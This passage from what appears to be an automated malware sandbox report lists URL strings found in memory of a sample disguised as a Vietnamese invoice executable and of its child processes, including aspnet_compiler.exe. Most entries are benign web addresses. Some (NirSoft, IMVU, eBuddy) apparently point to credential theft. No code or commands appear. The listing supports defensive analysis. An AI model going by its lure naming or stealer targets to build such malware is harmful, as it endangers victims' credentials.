              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: http://ocsp.pki.goog/gts1o1core0
              Source: bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.drString found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0#
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.drString found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0M
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: http://pki.goog/gsr2/GTSGIAG3.crt0)
              Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.354759645.00000000024F1000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.538650865.0000000002F81000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.537970433.000000000250C000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.537475545.00000000024E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/975a7d20/webcore/externalscripts/jquery/jquer
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/f60532dd-2923b6c2/directio
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/f60532dd-f8dd99d9/directio
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/11/755f86.png
              Source: bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/64/a8a064.gif
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/9b/e151e5.gif
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/ea/4996b9.woff
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAyuliQ.img?h=16&w=16&m
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAzjSw3.img?h=16&w=16&m
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB16g6qc.img?h=27&w=27&
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17milU.img?h=16&w=16&
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB18T33l.img?h=333&w=31
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19x3nX.img?h=166&w=31
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xCDZ.img?h=75&w=100
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xGDT.img?h=166&w=31
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xMWp.img?h=75&w=100
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xaUu.img?h=166&w=31
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xssM.img?h=75&w=100
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xzm6.img?h=250&w=30
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yF6n.img?h=333&w=31
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yFoT.img?h=75&w=100
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yuvA.img?h=250&w=30
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yxVU.img?h=166&w=31
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB7hjL.img?h=16&w=16&m=
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBO5Geh.img?h=16&w=16&m
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w=27&m
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBVuddh.img?h=16&w=16&m
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBX2afX.img?h=27&w=27&m
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBi9v6.img?m=6&o=true&u
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBnYSFZ.img?h=16&w=16&m
              Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.360191656.00000000065F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
              Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.360191656.00000000065F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
              Source: bhvF833.tmp.14.drString found in binary or memory: http://www.digicert.com/CPS0
              Source: aspnet_compiler.exe, 00000010.00000002.374522754.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
              Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.360191656.00000000065F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
              Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.360191656.00000000065F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
              Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.360191656.00000000065F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
              Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.360191656.00000000065F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
              Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.360191656.00000000065F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
              Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.360191656.00000000065F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
              Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.360191656.00000000065F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
              Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.360191656.00000000065F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
              Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.360191656.00000000065F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
              Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.360191656.00000000065F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
              Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.360191656.00000000065F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
              Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.360191656.00000000065F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
              Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.360191656.00000000065F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
              Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.360191656.00000000065F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
              Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.360191656.00000000065F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
              Source: aspnet_compiler.exe, 00000010.00000002.374522754.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.com
              Source: aspnet_compiler.exe, 00000010.00000002.374830340.00000000009EA000.00000004.00000010.00020000.00000000.sdmp, aspnet_compiler.exe, 0000001B.00000002.392736661.0000000000CF9000.00000004.00000010.00020000.00000000.sdmp, aspnet_compiler.exe, 00000020.00000002.416712597.0000000000CF9000.00000004.00000010.00020000.00000000.sdmp, aspnet_compiler.exe, 00000024.00000002.432581722.0000000000EFA000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com/
              Source: aspnet_compiler.exe, 00000029.00000002.453919934.000000000135A000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com/B
              Source: aspnet_compiler.exe, 00000010.00000002.374522754.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
              Source: aspnet_compiler.exe, 00000010.00000002.374522754.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
              Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.360191656.00000000065F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
              Source: bhv8995.tmp.39.drString found in binary or memory: http://www.msn.com
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: http://www.msn.com/
              Source: aspnet_compiler.exe, 0000000E.00000003.388842971.0000000002746000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000E.00000003.386957585.0000000002743000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000013.00000003.401780181.0000000002A83000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000013.00000003.405195939.0000000002A86000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000001D.00000003.436504638.00000000028D6000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000001D.00000003.433788536.00000000028D3000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000021.00000003.463221264.0000000003003000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000021.00000003.466714622.0000000003006000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000027.00000003.487705843.00000000028A6000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000027.00000003.481529759.00000000028A3000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000002A.00000003.504317340.0000000000A46000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000002A.00000003.500729020.0000000000A43000.00000004.00000800.00020000.00000000.sdmp, bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: http://www.msn.com/?ocid=iehp
              Source: aspnet_compiler.exe, 0000000E.00000003.386957585.0000000002743000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000E.00000003.386489638.0000000002743000.00000004.00000800.00020000.00000000.sdmp, bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp
              Source: bhv8995.tmp.39.drString found in binary or memory: http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/consent/55a804
              Source: bhv8995.tmp.39.drString found in binary or memory: http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/scripttemplate
              Source: aspnet_compiler.exe, 0000000E.00000002.397869869.00000000008F4000.00000004.00000010.00020000.00000000.sdmp, aspnet_compiler.exe, 00000021.00000002.477360003.0000000000FB4000.00000004.00000010.00020000.00000000.sdmp, aspnet_compiler.exe, 00000027.00000002.502161495.00000000008F4000.00000004.00000010.00020000.00000000.sdmp, aspnet_compiler.exe, 0000002A.00000002.513031021.00000000001B3000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
              Source: aspnet_compiler.exe, 0000001D.00000002.452238930.0000000000AF4000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net-ms-win-core-delayload-l1-1-0.dll.dlldll
              Source: aspnet_compiler.exe, 00000013.00000002.420022464.0000000000AF4000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net-ms-win-core-delayload-l1-1-0.dll.dlldllD
              Source: aspnet_compiler.exe, 00000010.00000002.374522754.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
              Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.360191656.00000000065F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
              Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.360191656.00000000065F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
              Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.360191656.00000000065F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
              Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.360191656.00000000065F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
              Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.360191656.00000000065F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
              Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.360191656.00000000065F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
              Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.360191656.00000000065F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
              Source: aspnet_compiler.exe, 0000000E.00000003.389075530.0000000002D72000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000E.00000003.386957585.0000000002743000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000E.00000003.387362891.0000000000FAA000.00000004.00000020.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000E.00000003.386841625.000000000274F000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000E.00000002.399020407.0000000002D72000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000013.00000003.405740742.00000000030B2000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000013.00000003.401873684.000000000120A000.00000004.00000020.00020000.00000000.sdmp, aspnet_compiler.exe, 00000013.00000003.401655529.0000000002A8F000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000013.00000002.422082458.00000000030B2000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000001D.00000002.455045363.0000000002FB2000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000001D.00000003.436842526.0000000002FB2000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000001D.00000003.433912633.000000000115A000.00000004.00000020.00020000.00000000.sdmp, aspnet_compiler.exe, 0000001D.00000003.433511256.00000000028DF000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000021.00000002.480242227.00000000036E2000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000021.00000003.467030743.00000000036E2000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000021.00000003.463006657.000000000300F000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000021.00000003.463367055.000000000148A000.00000004.00000020.00020000.00000000.sdmp, aspnet_compiler.exe, 00000027.00000003.481760272.00000000011BA000.00000004.00000020.00020000.00000000.sdmp, aspnet_compiler.exe, 00000027.00000003.488827265.0000000002F62000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000027.00000003.481292516.00000000028AF000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000027.00000002.504901021.0000000002F62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4476872748356;g
              Source: aspnet_compiler.exe, 0000000E.00000003.386957585.0000000002743000.00000004.00000800.00020000.00000000.sdmp, bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=68568119166
              Source: bhv8995.tmp.39.drString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=1463674
              Source: bhv8995.tmp.39.drString found in binary or memory: https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gt
              Source: aspnet_compiler.exe, 0000000E.00000003.386957585.0000000002743000.00000004.00000800.00020000.00000000.sdmp, bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: https://amp.azure.net/libs/amp/1.8.0/azuremediaplayer.min.js
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC54c8a2b02c3446f48a60b41e8a5ff47
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC5bdddb231cf54f958a5b6e76e9d8eee
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC828bc1cde9f04b788c98b5423157734
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC9b2d2bc73c8a4a1d8dd5c3d69b6634a
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCc13122162a9a46c3b4cbf05ffccde0f
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCc71c68d7b8f049b6a6f3b669bd5d00c
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCee0d4d5fd4424c8390d703b105f82c3
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCfd484f9188564713bbc5d13d862ebbf
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.drString found in binary or memory: https://assets.adobedtm.com/launch-EN7b3d710ac67a4a1195648458258f97dd.min.js
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: https://az416426.vo.msecnd.net/scripts/a/ai.0.js
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: https://az725175.vo.msecnd.net/scripts/jsll-4.js
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: https://contextual.media.net/
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: https://contextual.media.net/48/nrrV18753.js
              Source: bhv8995.tmp.39.drString found in binary or memory: https://contextual.media.net/803288796/fcmain.js?&gdpr=0&cid=8CU157172&cpcd=pC3JHgSCqY8UHihgrvGr0A%3
              Source: bhv8995.tmp.39.drString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
              Source: aspnet_compiler.exe, 0000000E.00000003.389075530.0000000002D72000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000E.00000003.386841625.000000000274F000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000013.00000003.401748327.0000000002A96000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000001D.00000003.433671270.00000000028E6000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000021.00000003.463192812.0000000003016000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000027.00000003.481477826.00000000028B6000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000002A.00000003.500671413.0000000000A56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contextual.media.net/checksync.phphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&
              Source: bhv8995.tmp.39.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
